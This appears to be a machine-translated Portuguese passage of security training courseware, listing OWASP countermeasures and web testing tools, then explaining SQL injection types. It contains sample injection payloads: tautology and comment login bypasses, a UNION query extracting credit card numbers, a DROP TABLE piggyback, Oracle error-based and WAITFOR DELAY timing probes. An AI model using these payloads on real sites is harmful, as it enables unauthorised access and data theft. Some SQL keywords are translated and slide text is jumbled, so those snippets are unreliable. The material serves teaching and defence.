o Implementar técnicas de lista branca, validação de entrada, saneamento e filtragem para

evitar dados hostis dentro dos documentos XML
o Atualize e corrija os processadores e bibliotecas XML mais recentes
o Certifique-se de que a função de upload de arquivo XML/XLS valide o XML usando XSD
validação
ÿ Controle de Acesso Quebrado
o Realizar verificações de controle de acesso antes de redirecionar o usuário autorizado para o recurso solicitado
o Evite usar IDs inseguros para evitar que o invasor os adivinhe
o Fornecer um mecanismo de tempo limite de sessão
o Limite as permissões de arquivo a usuários autorizados para evitar uso indevido
o Evite mecanismos de cache do lado do cliente
o Remover tokens de sessão no lado do servidor no logout do usuário
o Certifique-se de que os privilégios mínimos sejam atribuídos aos usuários para realizar apenas tarefas essenciais
ações
o Aplicar mecanismos de controle de acesso uma vez e reutilizá-los em todo o

inscrição

ÿ Má configuração de segurança
o Configure todos os mecanismos de segurança e desative todos os serviços não utilizados
o Configurar funções, permissões e contas e desativar todas as contas padrão ou alterar suas senhas padrão
o Verifique as vulnerabilidades de segurança mais recentes e aplique os patches de segurança mais recentes
o Solicitações não SSL para páginas da Web devem ser redirecionadas para a página SSL
o Defina o sinalizador 'seguro' em todos os cookies confidenciais
o Configure o provedor SSL para suportar apenas algoritmos fortes
o Certifique-se de que o certificado é válido e não expirou e que corresponde a todos os domínios
usado pelo site
o Backend e outras conexões também devem usar SSL ou outras tecnologias de criptografia
ÿ Ataques XSS
o Valide todos os cabeçalhos, cookies, strings de consulta, campos de formulário e campos ocultos (ou seja, todos
parâmetros) contra uma especificação rigorosa
o Use ferramentas de teste extensivamente durante a fase de design para eliminar essas lacunas de XSS no aplicativo
antes de entrar em uso
o Use um firewall de aplicativo da web para bloquear a execução de um script malicioso
o Converta todos os caracteres não alfanuméricos em entidades de caracteres HTML antes

exibindo a entrada do usuário em mecanismos de pesquisa e fóruns
o Codifique a entrada e a saída e filtre metacaracteres na entrada
o Nunca confie em sites que usam HTTPS quando se trata de XSS
o A filtragem da saída do script também pode derrotar as vulnerabilidades XSS, impedindo-as

sejam transmitidos aos usuários
o Implantar infraestrutura de chave pública (PKI) para autenticação, que verifica

que o script introduzido é realmente autenticado
o Implementar uma política de segurança rigorosa
o Servidores Web, servidores de aplicativos e ambientes de aplicativos Web são vulneráveis a scripts entre sites. É
difícil identificar e remover falhas XSS de aplicativos da web. A melhor maneira de encontrar falhas é realizar uma
revisão de segurança do código e pesquisar em todos os locais onde a entrada de uma solicitação HTTP vem como
uma saída por HTML.
o O invasor usa uma variedade de tags HTML para transmitir um JavaScript malicioso. Nessus, Nikto e outras
ferramentas podem ajudar até certo ponto na verificação de sites em busca dessas falhas.
Se a verificação descobrir uma vulnerabilidade em um site, é altamente provável que ele seja vulnerável a outros
ataques.

ÿ Desserialização Insegura
o Valide a entrada não confiável que deve ser serializada para garantir que os dados serializados
contém apenas classes confiáveis
o A desserialização de dados confiáveis deve cruzar um limite de confiança
o Os desenvolvedores devem reprojetar seus aplicativos
o Evite serialização para classes sensíveis à segurança
o Proteger dados confidenciais durante a desserialização
o Filtre dados seriais não confiáveis
o Aplicar verificações duplicadas do gerenciador de segurança em uma classe durante a serialização e

desserialização
o Entenda as permissões de segurança dadas para serialização e desserialização
o Implementar verificações de integridade ou criptografia dos objetos serializados para evitar modificação de
dados ou criação de objetos hostis
o Isole o código que desserializa para que seja executado em ambientes com privilégios muito baixos
o Registre as exceções e falhas de desserialização para que o tipo de entrada não seja o
igual ao tipo esperado; caso contrário, lança uma exceção
ÿ Usando Componentes com Vulnerabilidades Conhecidas
o Verifique regularmente as versões dos componentes do lado do cliente e do lado do servidor e suas
dependências
o Monitore continuamente fontes como o National Vulnerability Database (NVB) para vulnerabilidades em seus
componentes
o Aplicar patches de segurança regularmente
o Examine os componentes com scanners de segurança com frequência
o Aplicar políticas de segurança e práticas recomendadas para uso de componentes
o Revise todas as dependências, incluindo dependências transitivas, e certifique-se de que não sejam vulneráveis
o Manter um inventário regular das versões do lado do cliente e do lado do servidor

componentes regularmente
o Certifique-se de obter componentes de fontes oficiais e aceite apenas

pacotes
ÿ Registo e Monitorização Insuficientes
o Definir o escopo dos ativos cobertos no monitoramento de log para incluir informações críticas de negócios
áreas
o Configurar uma linha de base mínima para registro e garantir que ela seja seguida para todos os ativos

o Certifique-se de que os logs sejam registrados com o contexto do usuário para que sejam rastreáveis para
usuários
o Determinar o que registrar e qual log procurar por meio de incidentes proativos
identificação
o Executar sanitização em todos os dados de eventos para evitar ataques de injeção de log
o Implementar um mecanismo de registro comum para todo o aplicativo e usar

resposta eficaz a incidentes
o Certifique-se de que todos os logins, falhas de controle de acesso e falhas de validação de entrada possam ser
registrados com o contexto de usuário necessário para identificar contas suspeitas
o Certifique-se de que as transações de alto valor consistem em uma trilha de auditoria com controles de integridade
para evitar a adulteração dos bancos de dados, como tabelas de banco de dados somente anexadas

Ferramentas de teste de segurança de aplicativos da Web
N-Stalker Web
O scanner de segurança de aplicativos da Web N-Stalker verifica vulnerabilidades, como injeção de SQL,
Segurança do aplicativo
XSS e outros ataques conhecidos
scanner
Acunetix WVS
Estrutura de exploração do navegador (BeEF)

http:// beefproject.com
Metasploit
PowerSploit
https:// github.com
Vigilante
https:// www.nstalker.com
https:// www.casaba.com
Ferramentas de teste de segurança de aplicativos da Web
Existem várias ferramentas de avaliação de segurança de aplicativos da web disponíveis para varredura, detecção e
avaliação de vulnerabilidades/segurança de aplicativos da web. Essas ferramentas revelam sua postura de segurança;
você pode usá-los para encontrar maneiras de fortalecer a segurança e criar aplicativos da web robustos.
Além disso, essas ferramentas automatizam o processo de segurança precisa de aplicativos da web
avaliação.
ÿ N-Stalker Web App Security Scanner
Fonte: https:// www.nstalker.com
O N-Stalker Web App Security Scanner verifica vulnerabilidades como injeção de SQL, XSS e outros
ataques conhecidos. É uma ferramenta de segurança útil para desenvolvedores, administradores de sistema/
segurança, auditores de TI e funcionários, pois incorpora o conhecido “N-Stealth HTTP Security Scanner” e
seu banco de dados de 39.000 assinaturas de ataques na Web, juntamente com um componente Web
orientado tecnologia de avaliação de segurança de aplicativos.

Figura 7.38: Captura de tela do N-Stalker Web Application Security Scanner
Algumas ferramentas adicionais de teste de segurança de aplicativos da web são as seguintes:
ÿ Acunetix WVS (https:// www.acunetix.com)

ÿ Estrutura de exploração do navegador (BeEF) (http:// beefproject.com)
ÿ PowerSploit (https:// github.com)
ÿ Vigia (https:// www.casaba.com)


A injeção de SQL é o ataque mais comum e devastador que os invasores podem lançar para assumir o
controle de um site. Os invasores usam vários truques e técnicas para comprometer aplicativos da Web
orientados a dados, fazendo com que as organizações incorram em perdas graves em termos de dinheiro,
reputação, dados e funcionalidade. Esta seção discutirá os ataques de injeção de SQL, bem como as
ferramentas e técnicas usadas pelos invasores para realizar esses ataques.

Fluxo do módulo
1 2
Discutir tipos de SQL Discutir ataque de injeção de SQL
Ataques de Injeção Contramedidas
Discutir tipos de ataques de injeção de SQL

Os invasores usam vários truques e técnicas para visualizar, manipular, inserir e excluir dados do banco
de dados de um aplicativo. Dependendo da técnica utilizada, existem vários tipos de ataques de injeção
de SQL. Esta seção discute os conceitos básicos de injeção de SQL, vários tipos de ataques de injeção
de SQL e ferramentas de injeção de SQL.

O que é SQL Injection?
ÿ A injeção de SQL é uma técnica usada para tirar

proveito de vulnerabilidades de entrada não
sanitizadas para passar comandos SQL por meio
de um aplicativo da Web para execução por um
banco de dados de back -end
ÿ É um ataque básico usado para obter

acesso não autorizado a um banco
de dados ou recuperar informações
diretamente do banco de dados
O que é SQL Injection?
Linguagem de consulta estruturada (SQL) é uma linguagem textual usada por um servidor de banco de dados.
Os comandos SQL usados para executar operações no banco de dados incluem INSERT, SELECT, UPDATE e
DELETE. Esses comandos são usados para manipular dados no servidor de banco de dados.
Os programadores usam comandos SQL sequenciais com parâmetros fornecidos pelo cliente, facilitando a
injeção de comandos pelos invasores. A injeção de SQL é uma técnica usada para aproveitar as vulnerabilidades
de entrada não sanitizadas para passar comandos SQL por meio de um aplicativo da Web para execução por
um banco de dados de back-end. Nessa técnica, o invasor injeta consultas SQL maliciosas no formulário de
entrada do usuário para obter acesso não autorizado a um banco de dados ou para recuperar informações
diretamente do banco de dados. Esses ataques são possíveis por causa de uma falha em aplicativos da web e
não por causa de qualquer problema com o banco de dados ou o servidor da web.
Os ataques de injeção de SQL usam uma série de consultas ou instruções SQL maliciosas para manipular o
banco de dados diretamente. Um aplicativo geralmente usa instruções SQL para autenticar usuários no aplicativo,
validar funções e níveis de acesso, armazenar e obter informações para o aplicativo e o usuário e vincular a
outras fontes de dados. Os ataques de injeção de SQL funcionam porque o aplicativo não valida corretamente
uma entrada antes de passá-la para uma instrução SQL.

Por que se preocupar com SQL Injection?
Com base no uso de aplicativos e na maneira como eles processam os dados fornecidos pelo usuário, as injeções
de SQL podem ser usadas para implementar os seguintes tipos de ataques:
1 desvio de autenticação Integridade de dados comprometida 4
2 Desvio de Autorização Disponibilidade de dados comprometida 5
3 Divulgação de Informações Execução Remota de Código 6
Por que se preocupar com SQL Injection?
A injeção de SQL é um grande problema para todos os sites baseados em banco de dados. Um ataque pode ser
tentado em qualquer site normal ou pacote de software com base em como é usado e como processa os dados
fornecidos pelo usuário. A injeção de SQL pode ser usada para implementar os seguintes ataques:
ÿ Bypass de Autenticação: Usando este ataque, um invasor faz logon em um aplicativo sem fornecer um nome
de usuário e senha válidos e obtém privilégios administrativos.
ÿ Bypass de autorização: usando esse ataque, um invasor altera as informações de autorização armazenadas
no banco de dados explorando uma vulnerabilidade de injeção de SQL.
ÿ Divulgação de informações: usando esse ataque, um invasor obtém informações confidenciais armazenadas
no banco de dados.
ÿ Integridade de dados comprometida: usando este ataque, um invasor desfigura uma página da Web, insere
conteúdo malicioso em páginas da web ou altera o conteúdo de um banco de dados.
ÿ Disponibilidade de dados comprometida: usando este ataque, um invasor exclui as informações do banco
de dados, exclui logs ou audita as informações armazenadas em um banco de dados.
ÿ Execução remota de código: usando este ataque, um invasor compromete o sistema operacional host.

SQL Injection e tecnologias do lado do servidor
Tecnologia do lado do servidor
Tecnologias poderosas do lado do servidor, como ASP.NET e servidores de

banco de dados, permitem que os desenvolvedores criem sites dinâmicos
orientados a dados e aplicativos da Web com uma facilidade incrível
Explorar
O poder do ASP.NET e do SQL pode ser facilmente explorado por hackers usando
ataques de injeção de SQL
Bancos de Dados Susceptíveis
Todos os bancos de dados relacionais, SQL Server, Oracle, IBM DB2 e MySQL, são
suscetíveis a ataques de injeção de SQL
Ataque
Os ataques de injeção de SQL não exploram uma vulnerabilidade de software específica; em vez
disso, eles têm como alvo sites e aplicativos da web que não seguem práticas de codificação
seguras para acessar e manipular dados armazenados em um banco de dados relacional
SQL Injection e tecnologias do lado do servidor
Tecnologias poderosas do lado do servidor, como ASP.NET e servidores de banco de dados, permitem que os
desenvolvedores criem sites e aplicativos da Web dinâmicos e orientados a dados com uma facilidade incrível.
Essas tecnologias implementam a lógica de negócios no lado do servidor, que atende às solicitações recebidas dos
clientes. A tecnologia do lado do servidor acessa, entrega, armazena e restaura informações com facilidade. Várias
tecnologias do lado do servidor incluem ASP, ASP.Net, Cold Fusion, JSP, PHP, Python, Ruby on Rails e assim por
diante. Algumas dessas tecnologias são propensas a vulnerabilidades de injeção de SQL, e os aplicativos
desenvolvidos com essas tecnologias são vulneráveis a ataques de injeção de SQL. Os aplicativos da Web usam
várias tecnologias de banco de dados como parte de sua funcionalidade. Alguns bancos de dados relacionais
usados para desenvolver aplicativos da Web incluem Microsoft SQL Server, Oracle, IBM DB2 e MySQL de código
aberto. Às vezes, os desenvolvedores ignoram inadvertidamente as práticas de codificação segura ao usar essas
tecnologias, o que torna os aplicativos e os bancos de dados relacionais vulneráveis a ataques de injeção de SQL.
Esses ataques não exploram a vulnerabilidade de um software específico; em vez disso, eles visam sites e
aplicativos da Web que não seguem práticas de codificação segura para acessar e manipular os dados armazenados
em um banco de dados relacional.

Tipos de SQL Injection

Injeção SQL
SQL baseado em erro Sistema armazenado
injeção Procedimento
Ilegal/Logicamente
Injeção de SQL em banda Injeção SQL UNION
Consulta Incorreta
Tautologia
Cego/Inferencial
Injeção SQL
Comentário de fim de linha
Tempo de atraso
Comentário embutido
boleano
Exploração
SQL fora de banda
Consulta de acompanhamento
injeção
Consulta Pesada
Tipos de SQL Injection
Em um ataque de injeção SQL, o invasor injeta código malicioso por meio de uma consulta SQL que
pode ler dados confidenciais e até modificá-los (inserir/atualizar/excluir).
Existem três tipos principais de injeção de SQL:
ÿ In-band SQL Injection: Um invasor usa o mesmo canal de comunicação para executar o ataque
e recuperar os resultados. Ataques em banda são ataques de injeção SQL comumente usados
e fáceis de explorar. Os ataques de injeção de SQL em banda mais comumente usados são a
injeção de SQL baseada em erro e a injeção de UNION SQL.
ÿ Injeção SQL cega/inferencial: Na injeção cega/inferencial, o invasor não tem mensagens de erro
do sistema para trabalhar. Em vez disso, o invasor simplesmente envia uma consulta SQL
maliciosa ao banco de dados. Esse tipo de injeção SQL leva mais tempo para ser executado
porque o resultado retornado geralmente está na forma booleana. Os invasores usam resultados
verdadeiros ou falsos para determinar a estrutura do banco de dados e os dados. No caso de
injeção de SQL inferencial, nenhum dado é transmitido por meio do aplicativo da Web e não é
possível para um invasor recuperar o resultado real da injeção; portanto, é chamada de injeção
cega de SQL.
ÿ Injeção de SQL fora de banda: os invasores usam diferentes canais de comunicação (como
funcionalidade de e-mail de banco de dados ou funções de gravação e carregamento de
arquivos) para realizar o ataque e obter os resultados. Esse tipo de ataque é difícil de ser
executado porque o invasor precisa se comunicar com o servidor e determinar as características do banco de dad
servidor usado pelo aplicativo da web.

O diagrama abaixo mostra os diferentes tipos de injeção de SQL:
Figura 7.39: Tipos de SQL Injection

Injeção de SQL em banda

ÿ Os atacantes usam o mesmo canal de comunicação para realizar o ataque e recuperar os resultados
Injeção de SQL baseada em erro Consulta ilegal/logicamente incorreta
Os invasores inserem intencionalmente Os invasores enviam uma consulta incorreta ao banco de

entradas incorretas em um aplicativo, dados intencionalmente para gerar uma mensagem de erro que
fazendo com que ele gere erros de banco de dados pode ser útil na execução de novos ataques
Tipos de banda
Injeção SQL
Procedimento armazenado do sistema União SQL Injection
Os invasores exploram os procedimentos Os invasores usam uma cláusula UNION para adicionar uma
armazenados dos bancos de dados para consulta maliciosa à consulta solicitada
perpetrar seus ataques SELECIONE Nome, Telefone, Endereço DE Usuários WHERE Id=1
UNION ALL SELECT creditCardNumber,1,1 FROM
CreditCardTable
Injeção de SQL em banda (continuação)

Tipos de injeção de SQL em banda
Tautologia Comentários em linha
Os invasores injetam declarações que são Os invasores integram várias entradas

sempre verdadeiras para que as consultas vulneráveis em uma única consulta usando
sempre retornem resultados após avaliar o comentários embutidos
ONDE condição INSERT INTO Users (UserName, isAdmin, Password)
SELECT * FROM usuários WHERE nome =

VALUES('Atacante', 1, /*', 0, '*/'meupwd')
'' OU '1'='1';
Comentário de fim de linha Consulta de acompanhamento
Depois de injetar o código em um campo Os invasores injetam consultas maliciosas

específico, o código legítimo a seguir é adicionais na consulta original.
anulado usando comentários de fim de linha Consequentemente, o DBMS executa
SELECT * FROM usuário WHERE nome = várias consultas SQL
'x' E ID do usuário É NULL; --'; SELECT * FROM EMP ONDE EMP.EID = 1001 E EMP.ENAME =
'Bob'; SOLTA
DEPTO MESA;
Injeção de SQL em banda
Na injeção de SQL em banda, os invasores usam o mesmo canal de comunicação para realizar o ataque
e recuperar os resultados. Dependendo da técnica utilizada, existem vários tipos de ataques de injeção de
SQL em banda. Os ataques de injeção de SQL em banda mais comumente usados são a injeção de SQL
baseada em erro e a injeção de UNION SQL.

Os diferentes tipos de injeção de SQL dentro da banda são os seguintes:
ÿ Injeção de SQL baseada em erro
Um invasor insere intencionalmente entradas incorretas em um aplicativo, fazendo com que ele
retorne erros de banco de dados. O invasor lê as mensagens de erro resultantes no nível do banco
de dados para encontrar uma vulnerabilidade de injeção de SQL no aplicativo. Da mesma forma, o
invasor injeta consultas SQL especificamente projetadas para comprometer a segurança dos dados
do aplicativo. Essa abordagem é muito útil para criar uma solicitação de exploração de vulnerabilidade.
ÿ Procedimento Armazenado do Sistema
O risco de executar uma consulta SQL maliciosa em um procedimento armazenado aumenta se o

aplicativo da Web não limpar as entradas do usuário usadas para construir dinamicamente instruções
SQL para esse procedimento armazenado. Um invasor pode usar entradas maliciosas para executar as
instruções SQL maliciosas no procedimento armazenado. Os invasores exploram os procedimentos
armazenados dos bancos de dados para perpetrar seus ataques.
Por exemplo,
Criar procedimento Login @user_name varchar(20), @password

varchar(20) Como Declarar @consulta varchar(250) Definir @consulta = ' Selecione
1 da tabela de usuário Onde nome de usuário = ''e senha + @password
+ @user_name + exec(@query) Vá
= '
Se o invasor inserir as seguintes entradas nos campos de entrada do aplicativo usando o
procedimento armazenado acima em execução no back-end, ele poderá fazer login com qualquer
senha.
Entrada do usuário: qualquer nome de usuário ou 1=1' qualquer senha
ÿ Consulta ilegal/logicamente incorreta
Um invasor pode obter conhecimento injetando solicitações ilegais/logicamente incorretas, como

parâmetros injetáveis, tipos de dados, nomes de tabelas e assim por diante. Nesse ataque de injeção
de SQL, um invasor envia intencionalmente uma consulta incorreta ao banco de dados para gerar
uma mensagem de erro que pode ser útil para a execução de novos ataques. Essa técnica pode
ajudar um invasor a extrair a estrutura do banco de dados subjacente.
Por exemplo, para encontrar o nome da coluna, um invasor pode fornecer a seguinte entrada
maliciosa:
Nome de usuário: 'Bob'
A consulta resultante será

SELECT * FROM Users WHERE UserName = 'Bob"' AND password =
Após executar a consulta acima, o banco de dados pode retornar a seguinte mensagem de erro:
''
"Sintaxe incorreta perto de 'Bob'. Aspas não fechadas após a string de caracteres E
Password='xxx''."

ÿ Injeção UNION SQL

A instrução “UNION SELECT” retorna a união do conjunto de dados pretendido e o conjunto de dados de
destino. Em uma injeção UNION SQL, um invasor usa uma cláusula UNION para anexar uma consulta
maliciosa à consulta solicitada, conforme mostrado no exemplo a seguir:
SELECIONE Nome, Telefone, Endereço FROM Usuários WHERE Id=1 UNION ALL
SELECT creditCardNumber,1,1 FROM CreditCardTable
O invasor verifica a vulnerabilidade de injeção UNION SQL adicionando uma aspa simples (') ao final de um
comando ".php?id=". O tipo de mensagem de erro recebida informará ao invasor se o banco de dados é
vulnerável a uma injeção UNION SQL.
ÿ Tautologia
Em um ataque de injeção de SQL baseado em tautologia, um invasor usa uma cláusula OR condicional de
modo que a condição da cláusula WHERE sempre seja verdadeira. Esse ataque pode ser usado para ignorar
a autenticação do usuário.
Por exemplo,
SELECT * FROM usuários WHERE nome = '' OU '1'='1';

Esta consulta sempre será verdadeira, pois a segunda parte da cláusula OR é sempre verdadeira.
ÿ Comentário de Fim de Linha
Nesse tipo de injeção de SQL, um invasor usa comentários de linha em entradas específicas de injeção de
SQL. Os comentários em uma linha de código geralmente são indicados por (--) e são ignorados pela consulta.
Um invasor aproveita esse recurso de comentário escrevendo uma linha de código que termina em um
comentário. O banco de dados executará o código até atingir a parte comentada, após o que ignorará o
restante da consulta.
Por exemplo,
SELECT * FROM membros WHERE nome de usuário = 'admin'--' AND senha = 'senha'
Com essa consulta, um invasor pode fazer login em uma conta de administrador sem a senha, pois o aplicativo
de banco de dados ignorará os comentários que começam imediatamente após nome de usuário = 'admin'.
ÿ Comentários em Linha
Os invasores simplificam um ataque de injeção de SQL integrando várias entradas vulneráveis em uma única
consulta usando comentários em linha. Esse tipo de injeção permite que um invasor ignore a lista negra,
remova espaços, ofusque e determine as versões do banco de dados.
Por exemplo,
INSERT INTO Users (UserName, isAdmin, Password) VALUES ('".$username."',

0, '.$password."')"
é uma consulta dinâmica que solicita que um novo usuário insira um nome de usuário e uma senha.
O invasor pode fornecer entradas maliciosas da seguinte maneira.

UserName = Atacante', 1, /*
Senha = */'meupwd
Depois que essas entradas maliciosas são injetadas, a consulta gerada concede privilégios de
administrador ao invasor.
INSERT INTO Users (UserName, isAdmin, Password)
VALUES('Atacante', 1, /*', 0, '*/'meupwd')
ÿ Consulta de Piggyback
Em um ataque de injeção SQL piggybacked, um invasor injeta uma consulta maliciosa adicional
na consulta original. Esse tipo de injeção geralmente é executado em consultas SQL em lote.
A consulta original permanece inalterada e a consulta do invasor é pega carona na consulta
original. Devido ao piggybacking, o DBMS recebe várias consultas SQL.
Os invasores usam ponto-e-vírgula (;) como delimitador de consulta para separar as consultas.
Depois de executar a consulta original, o DBMS reconhece o delimitador e executa a consulta
piggyback. Esse tipo de ataque também é conhecido como ataque de consultas empilhadas. A
intenção do invasor é extrair, adicionar, modificar ou excluir dados, executar comandos remotos
ou realizar um ataque DoS.
Por exemplo, a consulta SQL original é a seguinte:

SELECT * FROM EMP ONDE EMP.EID = 1001 E EMP.ENAME = 'Bob'
Agora, o invasor concatena o delimitador (;) e a consulta maliciosa à consulta original da

seguinte forma:
SELECT * FROM EMP ONDE EMP.EID = 1001 E EMP.ENAME = 'Bob'; DROP TABLE DEPT;
Depois de executar a primeira consulta e retornar as linhas do banco de dados resultantes, o

SGBD reconhece o delimitador e executa a consulta maliciosa injetada. Consequentemente, o
DBMS remove a tabela DEPT do banco de dados.

Injeção SQL Baseada em Erro

ÿ Injeção de SQL baseada em erro força o banco de dados a executar alguma operação na qual o resultado será
ser um erro
ÿ Esta exploração pode diferir dependendo do DBMS
ÿ Considere a consulta SQL mostrada abaixo:
SELECT * FROM produtos WHERE

id_product=$id_product
ÿ Considere a seguinte requisição para um script que
executa a query acima:
http://www.example.com/product.php?id=10
ÿ A solicitação maliciosa seria (por exemplo, Oracle 10g):
http://www.example.com/product.php? id=10||
UTL_INADDR.GET_HOST_NAME( (SELECIONE usuário
DE DUAL) )—
Injeção SQL Baseada em Erro

Vamos entender os detalhes da injeção de SQL baseada em erro. Conforme discutido anteriormente,
na injeção de SQL baseada em erro, o invasor força o banco de dados a retornar mensagens de erro
em resposta às suas entradas. Posteriormente, o invasor pode analisar as mensagens de erro obtidas
do banco de dados subjacente para coletar informações que possam ser usadas para construir a
consulta maliciosa. O invasor usa esse tipo de técnica de injeção de SQL quando não consegue explorar
nenhuma outra técnica de injeção de SQL diretamente. O objetivo principal dessa técnica é gerar a
mensagem de erro do banco de dados, que pode ser usada para executar um ataque de injeção de SQL bem-sucedido.
Tal exploração pode diferir de um DBMS para outro.
Considere a seguinte consulta SQL:
SELECT * FROM products WHERE id_product=$id_product Considere
a solicitação para um script que executa a consulta acima: http://
www.example.com/product.php?id=10 A solicitação maliciosa seria ( por
exemplo, Oracle 10g): http://www.example.com/product.php? id=10||
UTL_INADDR.GET_HOST_NAME( (SELECIONE usuário DE DUAL) )—
No exemplo citado, o testador concatena o valor 10 com o resultado da função

UTL_INADDR.GET_HOST_NAME. Essa função do Oracle vai tentar retornar o hostname do parâmetro
passado para ela, que é outra consulta, ou seja, o nome do usuário. Quando o banco de dados procura
um nome de host com o nome do banco de dados do usuário, ele falha e retorna uma mensagem de
erro como
ORA-292257: host SCOTT desconhecido
Então, o testador pode manipular o parâmetro passado para a função GET_HOST_NAME() e o resultado
será mostrado na mensagem de erro.

União SQL Injection

ÿ Essa técnica envolve unir uma consulta forjada à consulta original
` ÿ O resultado de uma consulta forjada será agregado ao resultado da consulta original, permitindo assim obter
os valores dos campos de outras tabelas
Exemplo:
SELECIONE Nome, Telefone, Endereço DE Usuários WHERE Id=$id
Agora defina o seguinte valor de ID:
$id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
A consulta final é mostrada abaixo:
SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1
DE CreditCardTable
A consulta acima une o resultado da consulta original com todos os usuários de cartão de crédito
União SQL Injection
Em uma injeção UNION SQL, um invasor combina uma consulta forjada com uma consulta solicitada
pelo usuário usando uma cláusula UNION. O resultado da consulta forjada será anexado ao resultado
da consulta original, o que possibilita obter os valores dos campos de outras tabelas. Antes de executar
a injeção UNION SQL, o invasor garante que haja um número igual de colunas participando da consulta
UNION. Para encontrar o número correto de colunas, o invasor primeiro inicia uma consulta usando
uma cláusula ORDER BY seguida de um número para indicar o número de colunas do banco de dados
selecionadas:
ORDENAR POR 10--
Se a consulta for executada com sucesso e nenhuma mensagem de erro aparecer, o invasor assumirá
que existem 10 ou mais colunas na tabela do banco de dados de destino. No entanto, se o aplicativo
exibir uma mensagem de erro como “Coluna desconhecida '10' na cláusula 'ordem'”, o invasor
presumirá que há menos de 10 colunas na tabela do banco de dados de destino. Por tentativa e erro,
um invasor pode descobrir o número exato de colunas na tabela do banco de dados de destino.
Depois que o invasor descobre o número de colunas, a próxima etapa é encontrar o tipo de coluna
usando uma consulta como
UNION SELECT 1,null,null—
Se a consulta for executada com sucesso, o invasor sabe que a primeira coluna é do tipo inteiro e pode
passar a aprender os tipos das outras colunas.
Depois que o invasor encontra o número correto de colunas, a próxima etapa é executar a injeção
UNION SQL.

Por exemplo,
SELECIONE Nome, Telefone, Endereço DE Usuários WHERE Id=$id
Agora, defina o seguinte valor de ID:
$id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
O invasor agora inicia uma consulta de injeção UNION SQL da seguinte maneira:
SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT
creditCardNumber,1,1 FROM CreditCardTable
A consulta acima junta o resultado da consulta original com todos os usuários de cartão de crédito.

Injeção SQL Cega/Inferencial
Nenhuma mensagem de erro Página Genérica Intensivo em tempo
Blind SQL Injection é usado quando um A injeção de SQL cega é idêntica a uma Esse tipo de ataque pode consumir muito
aplicativo da web é vulnerável a um injeção de SQL normal, exceto que uma tempo porque uma nova instrução deve
Injeção de SQL, mas os resultados da página personalizada genérica é exibida ser criada para cada bit recuperado
injeção não são visíveis para o invasor quando um invasor tenta explorar um
aplicativo em vez de ver uma mensagem de
erro útil
Observação: um invasor ainda pode roubar dados fazendo uma série de perguntas verdadeiras e falsas por meio de instruções SQL
Injeção SQL Cega/Inferencial
A injeção SQL cega é usada quando um aplicativo da Web é vulnerável a uma injeção SQL, mas os resultados
da injeção não são visíveis para o invasor. A injeção SQL cega é idêntica a uma injeção SQL normal, exceto
que, quando um invasor tenta explorar um aplicativo, ele vê uma página personalizada genérica em vez de
uma mensagem de erro útil. Na injeção cega de SQL, um invasor faz uma pergunta verdadeira ou falsa ao
banco de dados para determinar se o aplicativo é vulnerável à injeção de SQL.
Um ataque normal de injeção de SQL geralmente é possível quando o desenvolvedor usa mensagens de erro
genéricas sempre que ocorre um erro no banco de dados. Essas mensagens genéricas podem revelar
informações confidenciais ou fornecer um caminho para o invasor executar um ataque de injeção de SQL no aplicativo.
No entanto, quando os desenvolvedores desativam a mensagem de erro genérica para o aplicativo, é difícil
para o invasor executar um ataque de injeção de SQL. No entanto, não é impossível explorar tal aplicativo com
um ataque de injeção de SQL. A injeção cega difere da injeção SQL normal na maneira de recuperar dados do
banco de dados. Os invasores usam injeção cega de SQL para acessar dados confidenciais ou para destruir
dados. Os invasores podem roubar dados fazendo uma série de perguntas verdadeiras ou falsas por meio de
instruções SQL. Os resultados da injeção não são visíveis para o invasor. Esse tipo de ataque pode consumir
muito tempo porque o banco de dados deve gerar uma nova instrução para cada bit recém-recuperado.

Injeção SQL cega: nenhuma mensagem de erro retornada
hacker certificado'; drop table Pedidos --

Injeção SQL
Ataque
Atacante
Injeção cega de SQL (ataque bem-sucedido) Injeção de SQL Simples
http://www.certifiedhacker.com http://www.certifiedhacker.com
Provedor Microsoft OLE DB
Ops! para erro de drivers ODBC

'80040e14'
[Microsoft][ODBC SQL Server Driver]
[SQL Server]Aspas abertas antes da
Nós somos incapazes de cadeia de caracteres ''. /shopping/
processar seu pedido. Tente buy.aspx, linha 52
novamente mais tarde.
Injeção SQL cega: nenhuma mensagem de erro retornada
Vejamos a diferença entre as mensagens de erro obtidas quando os desenvolvedores utilizam mensagens
de erro genéricas e quando desativam a mensagem de erro genérica e utilizam uma mensagem de erro
customizada, conforme a figura abaixo.
Figura 7.40: Exemplo de Injeção SQL Cega
Quando um invasor tenta realizar uma injeção de SQL com a consulta “certifiedhacker'; drop table Orders
--”, dois tipos de mensagens de erro podem ser retornados. Uma mensagem de erro genérica pode ajudar o
invasor a executar ataques de injeção de SQL no aplicativo. No entanto, se

o desenvolvedor desativa as mensagens de erro genéricas, o aplicativo retornará uma mensagem de erro
personalizada, que não é útil para o invasor. Nesse caso, o invasor tentará um ataque cego de injeção de SQL.
Se a mensagem de erro genérica estiver em uso, o servidor retornará uma mensagem de erro com uma
explicação detalhada do erro, com drivers de banco de dados e detalhes do servidor ODBC SQL. Essas
informações podem ser usadas para executar ainda mais o ataque de injeção de SQL. Quando mensagens
personalizadas estão em uso, o navegador simplesmente exibe uma mensagem de erro informando que houve
um erro e que a solicitação não foi bem-sucedida, sem fornecer nenhum detalhe. Assim, o invasor não tem
escolha a não ser tentar um ataque cego de injeção de SQL.

Injeção SQL cega: WAITFOR DELAY (resposta SIM ou NÃO)

http://www.certifiedhacker.com
; SE EXISTE(SELECIONE * DO cartão de crédito)

AGUARDE ATRASO '0:0:10'--
Verifique
se o banco de
dados “cartão de crédito”
existe ou
NÃO
Ops!
não
nós somos incapazes de
processar o seu pedido.

Como nenhuma mensagem de erro é retornada, use o comando SIM
'waitfor delay' para verificar o status de execução do SQL Tente novamente mais tarde.
WAIT FOR DELAY 'tempo' (segundos)

http://www.certifiedhacker.com
Isso é como dormir, espere um tempo especificado.
A CPU é uma maneira segura de fazer um banco de dados
esperar.
AGUARDE ATRASO '0:0:10'-- dormir

por 10
Ops!
segundos
BENCHMARK() (minutos) nós somos incapazes de
Este comando é executado no servidor MySQL. processar o seu pedido.
BENCHMARK(quantas vezes, faça isso) Tente novamente mais tarde.
Injeção SQL cega: WAITFOR DELAY (resposta SIM ou NÃO)
